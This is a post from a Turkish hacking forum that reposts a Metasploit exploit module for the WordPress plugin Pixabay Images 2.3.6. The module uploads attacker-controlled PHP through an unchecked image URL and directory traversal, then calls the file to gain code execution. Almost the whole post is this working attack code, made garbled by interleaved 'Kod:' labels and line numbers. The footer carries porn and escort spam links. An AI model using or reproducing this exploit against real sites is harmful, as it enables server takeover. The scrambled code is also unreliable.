KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WordPress Pixabay Images PHP Code Upload Exploit
Konu : WordPress Pixabay Images PHP Code Upload Exploit - 04.02.2015, 15:20
Mesaj: #1
Alıntı:Tanim:
This Metasploit module exploits multiple vulnerabilities in the WordPress plugin Pixabay Images version 2.3.6. The plugin does not check the host of a provided download URL which can be used to store and execute malicious PHP code on the system. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
Kod:
##

Kod:
# This module requires Metasploit: http://metasploit.com/download

Kod:
# Current source: https://github.com/rapid7/metasploit-framework

Kod:
##

 
Kod:
class
Kod:
Metasploit3 < Msf::Exploit::Remote

Kod:
  
Kod:
include Msf::Exploit::FileDropper

Kod:
  
Kod:
include Msf::Exploit::Remote::HttpServer

Kod:
  
Kod:
include Msf::Exploit::Remote::HttpClient

Kod:
  
Kod:
include Msf::
Kod:
HTTP
Kod:
::Wordpress

 
Kod:
  
Kod:
Rank = ExcellentRanking

 
Kod:
  
Kod:
def
Kod:
initialize(info = {})

Kod:
    
Kod:
super
Kod:
(update_info(info,

Kod:
      
Kod:
'Name'
          
Kod:
=>
Kod:
'Wordpress Pixabay Images PHP Code Upload'
Kod:
,

Kod:
      
Kod:
'Description'
   
Kod:
=> %q{

Kod:
        
Kod:
This
Kod:
module
Kod:
exploits multiple vulnerabilities
Kod:
in
Kod:
the Wordpress plugin Pixabay

Kod:
        
Kod:
Images
Kod:
2
Kod:
.
Kod:
3
Kod:
.
Kod:
6
Kod:
. The plugin does
Kod:
not
Kod:
check the host of a provided download
Kod:
URL

Kod:
        
Kod:
which can be used to store
Kod:
and
Kod:
execute malicious
Kod:
PHP
Kod:
code on the system.

Kod:
      
Kod:
},

Kod:
      
Kod:
'Author'
 
Kod:
=>

Kod:
        
Kod:
[

Kod:
          
Kod:
'h0ng10'
Kod:
,
Kod:
# Discovery, Metasploit module

Kod:
        
Kod:
],

Kod:
      
Kod:
'License'
       
Kod:
=>
Kod:
MSF_LICENSE
Kod:
,

Kod:
      
Kod:
'References'
    
Kod:
=>

Kod:
        
Kod:
[

Kod:
          
Kod:
[
Kod:
'URL'
Kod:
,
Kod:
'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt'
Kod:
],

Kod:
          
Kod:
[
Kod:
'OSVDB'
Kod:
,
Kod:
'117145'
Kod:
],

Kod:
          
Kod:
[
Kod:
'OSVDB'
Kod:
,
Kod:
'117146'
Kod:
],

Kod:
          
Kod:
[
Kod:
'WPVDB'
Kod:
,
Kod:
'7758'
Kod:
]

Kod:
        
Kod:
],

Kod:
      
Kod:
'Privileged'
    
Kod:
=>
Kod:
false
Kod:
,

Kod:
      
Kod:
'Platform'
      
Kod:
=> [
Kod:
'php'
Kod:
],

Kod:
      
Kod:
'Arch'
          
Kod:
=>
Kod:
ARCH_PHP
Kod:
,

Kod:
      
Kod:
'Targets'
       
Kod:
=> [[
Kod:
'pixabay-images 2.3'
Kod:
, {}]],

Kod:
      
Kod:
'DefaultTarget'
 
Kod:
=>
Kod:
,

Kod:
      
Kod:
'Payload'
       
Kod:
=>

Kod:
        
Kod:
{

Kod:
          
Kod:
'DisableNops'
Kod:
=>
Kod:
true
Kod:
,

Kod:
        
Kod:
},

Kod:
      
Kod:
'Stance'
        
Kod:
=> Msf::Exploit::Stance::Aggressive,

Kod:
      
Kod:
'DisclosureDate'
Kod:
=>
Kod:
'Jan 19 2015'

Kod:
    
Kod:
))

 
Kod:
    
Kod:
register_options(

Kod:
      
Kod:
[

Kod:
        
Kod:
OptInt.
Kod:
new
Kod:
(
Kod:
'TRIES'
Kod:
, [
Kod:
true
Kod:
,
Kod:
'Number of guesses if initial name guess fails'
Kod:
,
Kod:
5
Kod:
]),

Kod:
        
Kod:
OptInt.
Kod:
new
Kod:
(
Kod:
'DEPTH'
Kod:
, [
Kod:
true
Kod:
,
Kod:
'Traversal path until the uploads folder'
Kod:
,
Kod:
4
Kod:
])

Kod:
      
Kod:
],
Kod:
self
Kod:
.
Kod:
class
Kod:
)

Kod:
  
Kod:
end

 
 
Kod:
  
Kod:
# Handle incoming requests from the server

Kod:
  
Kod:
def
Kod:
on_request_uri(cli, request)

Kod:
      
Kod:
print_status(
Kod:
"URI requested: #{request.raw_uri}"
Kod:
)

Kod:
      
Kod:
send_response(cli, payload.encoded)

Kod:
  
Kod:
end

 
Kod:
  
Kod:
# Create a custom URI

Kod:
  
Kod:
def
Kod:
generate_payload_uri

Kod:
      
Kod:
"#{get_uri}.php"

Kod:
  
Kod:
end

 
Kod:
  
Kod:
def
Kod:
call_payload(file_name)

Kod:
    
Kod:
res = send_request_cgi({

Kod:
      
Kod:
'method'
Kod:
=>
Kod:
'GET'
Kod:
,

Kod:
      
Kod:
'uri'
Kod:
=> normalize_uri(wordpress_url_wp_content,
Kod:
'uploads'
Kod:
, file_name)

Kod:
    
Kod:
},
Kod:
3
Kod:
)

 
Kod:
    
Kod:
res

Kod:
  
Kod:
end

 
Kod:
  
Kod:
def
Kod:
exploit

Kod:
    
Kod:
unless
Kod:
wordpress_and_online?

Kod:
      
Kod:
fail_with(Failure::NoTarget,
Kod:
"#{peer} - #{target_uri} does not seeem to be Wordpress site"
Kod:
)

Kod:
    
Kod:
end

 
Kod:
    
Kod:
print_status(
Kod:
"#{peer} - Starting up web service..."
Kod:
)

Kod:
    
Kod:
start_service

 
Kod:
    
Kod:
payload_uri = generate_payload_uri

Kod:
    
Kod:
vprint_status(
Kod:
"#{peer} - Using URI #{payload_uri}"
Kod:
)

 
Kod:
    
Kod:
random_file_name = rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
)

Kod:
    
Kod:
post = {

Kod:
      
Kod:
'pixabay_upload'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
),

Kod:
      
Kod:
'image_url'
Kod:
=> payload_uri,

Kod:
      
Kod:
'image_user'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
),

Kod:
      
Kod:
'q'
Kod:
=>
Kod:
"#{'../' * datastore['DEPTH']}#{random_file_name}"

Kod:
    
Kod:
}

 
Kod:
    
Kod:
print_status(
Kod:
"#{peer} - Uploading payload #{random_file_name}..."
Kod:
)

Kod:
    
Kod:
res = send_request_cgi({

Kod:
      
Kod:
'method'
Kod:
=>
Kod:
'POST'
Kod:
,

Kod:
      
Kod:
'uri'
Kod:
=> normalize_uri(wordpress_url_backend),

Kod:
      
Kod:
'vars_post'
Kod:
=> post

Kod:
    
Kod:
})

 
Kod:
    
Kod:
stop_service

 
Kod:
    
Kod:
unless
Kod:
res && res.code ==
Kod:
200
Kod:
&& res.headers[
Kod:
'date'
Kod:
]

Kod:
      
Kod:
fail_with(Failure::Unknown,
Kod:
"#{peer} - Upload failed or unable to guess the system time..."
Kod:
)

Kod:
    
Kod:
end

 
Kod:
    
Kod:
server_epoch_time = DateTime.strptime(res.headers[
Kod:
'date'
Kod:
],
Kod:
'%a, %d %b %Y %H:%M:%S GMT'
Kod:
).to_i

 
Kod:
    
Kod:
print_status(
Kod:
"#{peer} - Calling payload..."
Kod:
)

Kod:
    
Kod:
datastore[
Kod:
'TRIES'
Kod:
].times
Kod:
do
Kod:
|i|

Kod:
      
Kod:
payload_name =
Kod:
"#{random_file_name}_#{server_epoch_time + i}.php"

Kod:
      
Kod:
res = call_payload(payload_name)

Kod:
      
Kod:
if
Kod:
(res && res.code ==
Kod:
200
Kod:
) || session_created?

Kod:
        
Kod:
register_files_for_cleanup(payload_name)

Kod:
        
Kod:
break

Kod:
      
Kod:
end

Kod:
    
Kod:
end

Kod:
  
Kod:
end

 
Kod:
  
Kod:
def
Kod:
check

Kod:
    
Kod:
res = wordpress_and_online?

Kod:
    
Kod:
unless
Kod:
res

Kod:
      
Kod:
vprint_error(
Kod:
"#{peer} - It doesn't look like a Wordpress site"
Kod:
)

Kod:
      
Kod:
return
Kod:
Exploit::CheckCode::Unknown

Kod:
    
Kod:
end

 
Kod:
    
Kod:
# Send a request with a illegal URL to verify that the target is vulnerable

Kod:
    
Kod:
post = {

Kod:
      
Kod:
'pixabay_upload'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
),

Kod:
      
Kod:
'image_url'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
),

Kod:
      
Kod:
'image_user'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
),

Kod:
      
Kod:
'q'
Kod:
=> rand_text_alphanumeric(rand(
Kod:
5
Kod:
) +
Kod:
5
Kod:
)

Kod:
    
Kod:
}

 
Kod:
    
Kod:
res = send_request_cgi({

Kod:
      
Kod:
'method'
Kod:
=>
Kod:
'POST'
Kod:
,

Kod:
      
Kod:
'uri'
Kod:
=> normalize_uri(wordpress_url_backend),

Kod:
      
Kod:
'vars_post'
Kod:
=> post

Kod:
    
Kod:
})

 
Kod:
    
Kod:
if
Kod:
res && res.body && res.body.to_s =~ /Error:
Kod:
A
Kod:
valid
Kod:
URL
Kod:
was
Kod:
not
Kod:
provided/

Kod:
      
Kod:
return
Kod:
Exploit::CheckCode::Vulnerable

Kod:
    
Kod:
end

 
Kod:
    
Kod:
Exploit::CheckCode::Safe

Kod:
  
Kod:
end

Kod:
end

 
Kod:
        
Kod:
#  1337day.com [2015-02-04]  #




Alıntı:[/url][url=http://share.yandex.ru/go.xml?service=vkontakte&url=http%3A%2F%2Ftr.1337day.com%2Fexploit%2F23242&title=WordPress Pixabay Images PHP Code Upload Exploit]

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno